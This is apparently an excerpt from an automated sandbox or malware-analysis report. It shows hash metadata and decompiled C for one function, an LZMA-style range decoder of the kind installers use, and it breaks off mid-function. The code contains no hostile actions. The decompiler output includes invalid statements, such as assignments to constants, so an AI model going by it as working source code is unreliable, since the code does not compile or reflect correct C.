Instruction Fuzzy Hash: 83913171D00229CBDF28CF98C854BADBBB1FB44309F15816AD856BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004063CF Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004063CF() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406926))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
